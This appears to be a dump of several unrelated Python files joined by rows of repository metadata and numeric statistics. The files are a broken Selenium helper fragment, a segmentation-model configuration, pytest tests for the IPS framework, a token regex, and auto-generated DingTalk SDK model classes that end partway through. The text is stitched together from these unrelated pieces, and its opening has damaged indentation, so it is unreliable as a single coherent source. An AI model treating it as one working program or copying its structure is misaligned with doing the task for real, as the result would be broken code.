wd.find_element_by_name("selected[]").click()
def back_to_contacts_list(self):
wd = self.app.wd
wd.find_element_by_link_text("home").click()
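    # fill_form() and modification_first_contact() repeat the same
    # click/clear/send_keys steps per field. A minimal refactoring sketch
    # (hypothetical helper, not part of the original class):
    def change_field_value(self, field_name, text):
        wd = self.app.wd
        if text is not None:
            wd.find_element_by_name(field_name).click()
            wd.find_element_by_name(field_name).clear()
            wd.find_element_by_name(field_name).send_keys(text)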
| 43.74026
| 92
| 0.674584
| 481
| 3,368
| 4.336798
| 0.133056
| 0.129434
| 0.267977
| 0.309204
| 0.825024
| 0.785714
| 0.77373
| 0.74257
| 0.74257
| 0.715244
| 0
| 0.002186
| 0.184976
| 3,368
| 77
| 93
| 43.74026
| 0.757741
| 0.024941
| 0
| 0.71875
| 0
| 0
| 0.119207
| 0.037805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109375
| false
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2eb2974027709cc1e0ec9dc6c67cf2fab7162c13
| 4,875
|
py
|
Python
|
model/model_config.py
|
shijun18/TMLI-PLAN
|
0097d5674852eba75487b153600fc1cd5518b2a8
|
[
"MIT"
] | 6
|
2021-07-26T08:01:55.000Z
|
2022-02-07T01:52:53.000Z
|
model/model_config.py
|
shijun18/TMLI-PLAN
|
0097d5674852eba75487b153600fc1cd5518b2a8
|
[
"MIT"
] | null | null | null |
model/model_config.py
|
shijun18/TMLI-PLAN
|
0097d5674852eba75487b153600fc1cd5518b2a8
|
[
"MIT"
] | 2
|
2022-02-28T07:13:12.000Z
|
2022-03-01T07:12:52.000Z
|
MODEL_CONFIG = {
'unet':{
'simplenet':{
'in_channels':1,
'encoder_name':'simplenet',
'encoder_depth':5,
'encoder_channels':[32,64,128,256,512], #[1,2,4,8,16]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[8,4,2,1]
'upsampling':1,
'classes':2,
'aux_classifier': False
},
'swin_transformer':{
'in_channels':1,
'encoder_name':'swin_transformer',
'encoder_depth':4,
'encoder_channels':[96,192,384,768], #[4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64], #[16,8,4]
'upsampling':4,
'classes':2,
'aux_classifier': False
},
'swinplusr18':{
'in_channels':1,
'encoder_name':'swinplusr18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
}
},
# att unet
'att_unet':{
'simplenet':{
'in_channels':1,
'encoder_name':'simplenet',
'encoder_depth':5,
'encoder_channels':[32,64,128,256,512], #[1,2,4,8,16]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[8,4,2,1]
'upsampling':1,
'classes':2,
'aux_classifier': False
},
'swin_transformer':{
'in_channels':1,
'encoder_name':'swin_transformer',
'encoder_depth':4,
'encoder_channels':[96,192,384,768], #[4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64], #[16,8,4]
'upsampling':4,
'classes':2,
'aux_classifier': False
},
'resnet18':{
'in_channels':1,
'encoder_name':'resnet18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
}
},
# res unet
'res_unet':{
'simplenet':{
'in_channels':1,
'encoder_name':'simplenet_res',
'encoder_depth':5,
'encoder_channels':[32,64,128,256,512], #[1,2,4,8,16]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[8,4,2,1]
'upsampling':1,
'classes':2,
'aux_classifier': False
},
'resnet18':{
'in_channels':1,
'encoder_name':'resnet18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
},
'swinplusr18':{
'in_channels':1,
'encoder_name':'swinplusr18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
}
},
# deeplabv3+
'deeplabv3+':{
'swinplusr18':{
'in_channels':1,
'encoder_name':'swinplusr18',
'encoder_weights':None,
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_output_stride':32, #[8,16,32]
'decoder_channels':256, #[4]
'decoder_atrous_rates':(12, 24, 36),
'upsampling':4,
'classes':2,
'aux_classifier': False
}
}
}
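# A minimal lookup sketch (assumption: callers pick a net/encoder pair and unpack
# the entry as keyword arguments; the constructor name here is hypothetical):
# cfg = MODEL_CONFIG['deeplabv3+']['swinplusr18']
# model = DeepLabV3Plus(**cfg)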
| 34.090909
| 67
| 0.489846
| 509
| 4,875
| 4.459725
| 0.100196
| 0.087225
| 0.048458
| 0.079295
| 0.944934
| 0.944934
| 0.944934
| 0.928634
| 0.886784
| 0.886784
| 0
| 0.125396
| 0.352205
| 4,875
| 143
| 68
| 34.090909
| 0.593414
| 0.050667
| 0
| 0.828571
| 0
| 0
| 0.394788
| 0.088599
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ef48423560f58a00ccd135216e6bc0bac6865e7
| 14,022
|
py
|
Python
|
tests/multirun/test_basic_serial.py
|
ORNL-Fusion/IPS-framework
|
b91951032393cc15eb828cf787d583ea686204cc
|
[
"BSD-3-Clause"
] | null | null | null |
tests/multirun/test_basic_serial.py
|
ORNL-Fusion/IPS-framework
|
b91951032393cc15eb828cf787d583ea686204cc
|
[
"BSD-3-Clause"
] | null | null | null |
tests/multirun/test_basic_serial.py
|
ORNL-Fusion/IPS-framework
|
b91951032393cc15eb828cf787d583ea686204cc
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import shutil
import glob
import pytest
from ipsframework import Framework
def copy_config_and_replace(infile, srcdir, tmpdir):
with open(os.path.join(srcdir, infile), "r") as fin:
with open(os.path.join(tmpdir, infile), "w") as fout:
for line in fin:
if line.startswith("SIM_ROOT"):
fout.write(f"SIM_ROOT = {tmpdir}/$SIM_NAME\n")
IPS_ROOT = os.path.abspath(os.path.join(srcdir, '..', '..'))
fout.write(f"IPS_ROOT = {IPS_ROOT}\n")
else:
fout.write(line)
@pytest.mark.skipif(not shutil.which('mpirun'), reason="requires mpirun")
def test_basic_serial1(tmpdir, capfd):
datadir = os.path.dirname(__file__)
copy_config_and_replace("basic_serial1.ips", datadir, tmpdir)
shutil.copy(os.path.join(datadir, "platform.conf"), tmpdir)
    # set up 'input' files
os.system(f"cd {tmpdir}; touch file1 ofile1 ofile2 sfile1 sfile2")
framework = Framework(config_file_list=[os.path.join(tmpdir, 'basic_serial1.ips')],
log_file_name=os.path.join(tmpdir, 'test.log'),
platform_file_name=os.path.join(tmpdir, "platform.conf"),
debug=None,
verbose_debug=None,
cmd_nodes=0,
cmd_ppn=0)
framework.run()
# Check stdout
captured = capfd.readouterr()
captured_out = captured.out.split('\n')
assert captured_out[0].startswith("Starting IPS")
assert captured_out[1] == "Created <class 'small_worker.small_worker'>"
assert captured_out[2] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[3] == "Created <class 'large_worker.large_worker'>"
assert captured_out[4] == "small_worker : init() called"
assert captured_out[6] == "medium_worker : init() called"
assert captured_out[8] == "large_worker : init() called"
assert captured_out[10] == "Current time = 3.50"
assert captured_out[11] == "Current time = 3.60"
assert captured_out[12] == "Current time = 3.70"
# check files copied and created
driver_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/drivers_testing_basic_serial1_*/*")))]
for infile in ["file1", "ofile1", "ofile2", "sfile1", "sfile2"]:
assert infile in driver_files
small_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/workers_testing_small_worker_*/*")))]
medium_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/workers_testing_medium_worker_*/*")))]
large_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/workers_testing_large_worker_*/*")))]
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
assert outfile in small_worker_files
assert outfile in medium_worker_files
assert outfile in large_worker_files
# check contents of my_out files
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
for worker in ["workers_testing_small_worker_2", "workers_testing_medium_worker_3"]:
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_4"
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
# check sim log file
with open(str(tmpdir.join("test_basic_serial1_0").join("test_basic_serial1_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_2", "medium_worker_3", "large_worker_4"]:
for timestamp in ["3.50", "3.60", "3.70"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
@pytest.mark.skipif(not shutil.which('mpirun'), reason="requires mpirun")
def test_basic_serial_multi(tmpdir, capfd):
    # This is the same as test_basic_serial1 except that 2 simulation files are used at the same time
datadir = os.path.dirname(__file__)
copy_config_and_replace("basic_serial1.ips", datadir, tmpdir)
copy_config_and_replace("basic_serial2.ips", datadir, tmpdir)
shutil.copy(os.path.join(datadir, "platform.conf"), tmpdir)
    # set up 'input' files
os.system(f"cd {tmpdir}; touch file1 ofile1 ofile2 sfile1 sfile2")
framework = Framework(config_file_list=[os.path.join(tmpdir, 'basic_serial1.ips'),
os.path.join(tmpdir, 'basic_serial2.ips')],
log_file_name=os.path.join(tmpdir, 'test.log'),
platform_file_name=os.path.join(tmpdir, "platform.conf"),
debug=None,
verbose_debug=None,
cmd_nodes=0,
cmd_ppn=0)
framework.run()
# Check stdout
    # skip checking the output because the two simulations sometimes write over the top of each other when running in parallel
"""
captured = capfd.readouterr()
captured_out = captured.out.split('\n')
assert captured_out[0] == "Created <class 'small_worker.small_worker'>"
assert captured_out[1] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[2] == "Created <class 'large_worker.large_worker'>"
assert captured_out[3] == "Created <class 'small_worker.small_worker'>"
assert captured_out[4] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[5] == "Created <class 'large_worker.large_worker'>"
assert captured_out[7] == "small_worker : init() called"
assert captured_out[9] == "small_worker : init() called"
assert captured_out[11] == "medium_worker : init() called"
assert captured_out[13] == "medium_worker : init() called"
assert captured_out[15] == "large_worker : init() called"
assert captured_out[17] == "large_worker : init() called"
assert captured_out[19] == "Current time = 1.00"
assert captured_out[20] == "Current time = 1.00"
assert captured_out[21] == "Current time = 2.00"
assert captured_out[22] == "Current time = 2.00"
assert captured_out[23] == "Current time = 3.00"
assert captured_out[24] == "Current time = 3.00"
"""
# check files copied and created
for no in ["1", "2"]:
        # simulation 2 is skipped for now, although the same checks should also pass for it
if no == "2":
continue
driver_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/drivers_testing_basic_serial1_*/*")))]
for infile in ["file1", "ofile1", "ofile2", "sfile1", "sfile2"]:
assert infile in driver_files
small_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/workers_testing_small_worker_*/*")))]
medium_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/workers_testing_medium_worker_*/*")))]
large_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/workers_testing_large_worker_*/*")))]
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
assert outfile in small_worker_files
assert outfile in medium_worker_files
assert outfile in large_worker_files
# check contents of my_out files
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
for worker in ["workers_testing_small_worker_2", "workers_testing_medium_worker_3"]:
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_4"
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
for outfile in ["my_out3.40", "my_out3.50", "my_out3.60"]:
for worker in ["workers_testing_small_worker_6", "workers_testing_medium_worker_7"]:
with open(str(tmpdir.join("test_basic_serial2_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_8"
with open(str(tmpdir.join("test_basic_serial2_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
# check basic_serial1 sim log file
with open(str(tmpdir.join("test_basic_serial1_0").join("test_basic_serial1_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_2", "medium_worker_3", "large_worker_4"]:
for timestamp in ["3.50", "3.60", "3.70"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
# check basic_serial2 sim log file
with open(str(tmpdir.join("test_basic_serial2_0").join("test_basic_serial2_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_6", "medium_worker_7", "large_worker_8"]:
for timestamp in ["3.40", "3.50", "3.60"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
@pytest.mark.skipif(not shutil.which('mpirun'), reason="requires mpirun")
def test_basic_concurrent1(tmpdir, capfd):
datadir = os.path.dirname(__file__)
copy_config_and_replace("basic_concurrent1.ips", datadir, tmpdir)
shutil.copy(os.path.join(datadir, "platform.conf"), tmpdir)
    # set up 'input' files
os.system(f"cd {tmpdir}; touch file1 ofile1 ofile2 sfile1 sfile2")
framework = Framework(config_file_list=[os.path.join(tmpdir, 'basic_concurrent1.ips')],
log_file_name=os.path.join(tmpdir, 'test.log'),
platform_file_name=os.path.join(tmpdir, "platform.conf"),
debug=None,
verbose_debug=None,
cmd_nodes=0,
cmd_ppn=0)
framework.run()
# Check stdout
captured = capfd.readouterr()
captured_out = captured.out.split('\n')
assert captured_out[0].startswith("Starting IPS")
assert captured_out[1] == "Created <class 'small_worker.small_worker'>"
assert captured_out[2] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[3] == "Created <class 'large_worker.large_worker'>"
assert captured_out[4] == "small_worker : init() called"
assert captured_out[6] == "medium_worker : init() called"
assert captured_out[8] == "large_worker : init() called"
assert captured_out[10] == "Current time = 3.50"
assert captured_out[11] == "nonblocking wait_call() invoked before call 10 finished"
assert captured_out[12] == "Current time = 3.60"
assert captured_out[13] == "nonblocking wait_call() invoked before call 13 finished"
assert captured_out[14] == "Current time = 3.70"
assert captured_out[15] == "nonblocking wait_call() invoked before call 16 finished"
# check files copied and created
driver_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/drivers_testing_basic_concurrent1_*/*")))]
for infile in ["file1", "ofile1", "ofile2", "sfile1", "sfile2"]:
assert infile in driver_files
small_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/workers_testing_small_worker_*/*")))]
medium_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/workers_testing_medium_worker_*/*")))]
large_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/workers_testing_large_worker_*/*")))]
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
assert outfile in small_worker_files
assert outfile in medium_worker_files
assert outfile in large_worker_files
# check contents of my_out files
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
for worker in ["workers_testing_small_worker_2", "workers_testing_medium_worker_3"]:
with open(str(tmpdir.join("test_basic_concurrent1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_4"
with open(str(tmpdir.join("test_basic_concurrent1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
# check sim log file
with open(str(tmpdir.join("test_basic_concurrent1_0").join("test_basic_concurrent1_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_2", "medium_worker_3", "large_worker_4"]:
for timestamp in ["3.50", "3.60", "3.70"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
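# The sim-log assertions recur in all three tests above. A minimal helper sketch
# (hypothetical function, not part of the original module):
def check_sim_log(tmpdir, sim_name, workers, timestamps):
    with open(str(tmpdir.join(sim_name).join(f"{sim_name}.log")), 'r') as f:
        # drop the leading timestamp column, as the tests above do
        lines = [line[24:] for line in f.readlines()]
    for worker in workers:
        for timestamp in timestamps:
            assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines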
| 50.438849
| 155
| 0.656254
| 1,970
| 14,022
| 4.447716
| 0.092386
| 0.059005
| 0.079548
| 0.038804
| 0.90436
| 0.880963
| 0.866697
| 0.811116
| 0.811116
| 0.773454
| 0
| 0.034267
| 0.213308
| 14,022
| 277
| 156
| 50.620939
| 0.76004
| 0.048852
| 0
| 0.703911
| 0
| 0.022346
| 0.337449
| 0.151819
| 0
| 0
| 0
| 0
| 0.26257
| 1
| 0.022346
| false
| 0
| 0.027933
| 0
| 0.050279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d31440ed4e9fbf947a8c3d508857ceca16c6aead
| 113
|
py
|
Python
|
saleor/core/__init__.py
|
X10project/rob_photography
|
baaeed11e13d1f4977c24f5f6601b1c6fbcf39b5
|
[
"BSD-3-Clause"
] | 3
|
2015-12-30T19:06:27.000Z
|
2021-10-06T04:23:36.000Z
|
saleor/core/__init__.py
|
X10project/rob_photography
|
baaeed11e13d1f4977c24f5f6601b1c6fbcf39b5
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/core/__init__.py
|
X10project/rob_photography
|
baaeed11e13d1f4977c24f5f6601b1c6fbcf39b5
|
[
"BSD-3-Clause"
] | 4
|
2019-09-17T11:39:41.000Z
|
2022-01-24T10:22:50.000Z
|
TOKEN_PATTERN = ('(?P<token>[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}'
'-[0-9a-z]{12})')
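# A minimal matching sketch (illustrative token only):
# import re
# token = "0123abcd-0123-abcd-0123-0123456789ab"
# assert re.fullmatch(TOKEN_PATTERN, token).group("token") == token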
| 28.25
| 76
| 0.39823
| 24
| 113
| 1.833333
| 0.375
| 0.340909
| 0.454545
| 0.340909
| 0.431818
| 0.431818
| 0.431818
| 0.431818
| 0.431818
| 0.431818
| 0
| 0.175824
| 0.19469
| 113
| 3
| 77
| 37.666667
| 0.307692
| 0
| 0
| 0
| 0
| 0.5
| 0.633929
| 0.508929
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d32980615396492dbc9c686b56facfbaafbfdd70
| 169,101
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/exclusive_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/exclusive_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/exclusive_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List, Any
class GetConferenceDetailHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetConferenceDetailResponseBodyMemberList(TeaModel):
def __init__(
self,
union_id: str = None,
name: str = None,
attend_duration: float = None,
staff_id: str = None,
):
        # user unionId
        self.union_id = union_id
        # user nickname
        self.name = name
        # attendance duration
        self.attend_duration = attend_duration
        # staff id
        self.staff_id = staff_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.union_id is not None:
result['unionId'] = self.union_id
if self.name is not None:
result['name'] = self.name
if self.attend_duration is not None:
result['attendDuration'] = self.attend_duration
if self.staff_id is not None:
result['staffId'] = self.staff_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('attendDuration') is not None:
self.attend_duration = m.get('attendDuration')
if m.get('staffId') is not None:
self.staff_id = m.get('staffId')
return self
class GetConferenceDetailResponseBody(TeaModel):
def __init__(
self,
conference_id: str = None,
title: str = None,
conf_start_time: float = None,
duration: float = None,
total_num: int = None,
attendee_num: int = None,
attendee_percentage: str = None,
caller_id: str = None,
caller_name: str = None,
member_list: List[GetConferenceDetailResponseBodyMemberList] = None,
):
        # conference ID
        self.conference_id = conference_id
        # conference title
        self.title = title
        # start time
        self.conf_start_time = conf_start_time
        # duration
        self.duration = duration
        # number of invited participants
        self.total_num = total_num
        # number of attendees
        self.attendee_num = attendee_num
        # attendance rate
        self.attendee_percentage = attendee_percentage
        # caller unionId
        self.caller_id = caller_id
        # caller nickname
        self.caller_name = caller_name
        # list of attendees
        self.member_list = member_list
def validate(self):
if self.member_list:
for k in self.member_list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.conference_id is not None:
result['conferenceId'] = self.conference_id
if self.title is not None:
result['title'] = self.title
if self.conf_start_time is not None:
result['confStartTime'] = self.conf_start_time
if self.duration is not None:
result['duration'] = self.duration
if self.total_num is not None:
result['totalNum'] = self.total_num
if self.attendee_num is not None:
result['attendeeNum'] = self.attendee_num
if self.attendee_percentage is not None:
result['attendeePercentage'] = self.attendee_percentage
if self.caller_id is not None:
result['callerId'] = self.caller_id
if self.caller_name is not None:
result['callerName'] = self.caller_name
result['memberList'] = []
if self.member_list is not None:
for k in self.member_list:
result['memberList'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('conferenceId') is not None:
self.conference_id = m.get('conferenceId')
if m.get('title') is not None:
self.title = m.get('title')
if m.get('confStartTime') is not None:
self.conf_start_time = m.get('confStartTime')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('totalNum') is not None:
self.total_num = m.get('totalNum')
if m.get('attendeeNum') is not None:
self.attendee_num = m.get('attendeeNum')
if m.get('attendeePercentage') is not None:
self.attendee_percentage = m.get('attendeePercentage')
if m.get('callerId') is not None:
self.caller_id = m.get('callerId')
if m.get('callerName') is not None:
self.caller_name = m.get('callerName')
self.member_list = []
if m.get('memberList') is not None:
for k in m.get('memberList'):
temp_model = GetConferenceDetailResponseBodyMemberList()
self.member_list.append(temp_model.from_map(k))
return self
class GetConferenceDetailResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetConferenceDetailResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetConferenceDetailResponseBody()
self.body = temp_model.from_map(m['body'])
return self
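# A minimal round-trip sketch for these generated models (illustrative values):
# body = GetConferenceDetailResponseBody().from_map(
#     {'conferenceId': 'cid-1', 'memberList': [{'unionId': 'u-1', 'name': 'n'}]})
# assert body.to_map()['conferenceId'] == 'cid-1'
# assert body.member_list[0].union_id == 'u-1'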
class GetUserAppVersionSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetUserAppVersionSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
        # starting cursor for paging through the data
        self.next_token = next_token
        # number of records per page
        self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetUserAppVersionSummaryResponseBodyData(TeaModel):
def __init__(
self,
stat_date: str = None,
org_name: str = None,
client: str = None,
app_version: str = None,
user_cnt: float = None,
):
        # statistics date
        self.stat_date = stat_date
        # organization name
        self.org_name = org_name
        # client (platform) information
        self.client = client
        # version information
        self.app_version = app_version
        # user count
        self.user_cnt = user_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.org_name is not None:
result['orgName'] = self.org_name
if self.client is not None:
result['client'] = self.client
if self.app_version is not None:
result['appVersion'] = self.app_version
if self.user_cnt is not None:
result['userCnt'] = self.user_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
if m.get('client') is not None:
self.client = m.get('client')
if m.get('appVersion') is not None:
self.app_version = m.get('appVersion')
if m.get('userCnt') is not None:
self.user_cnt = m.get('userCnt')
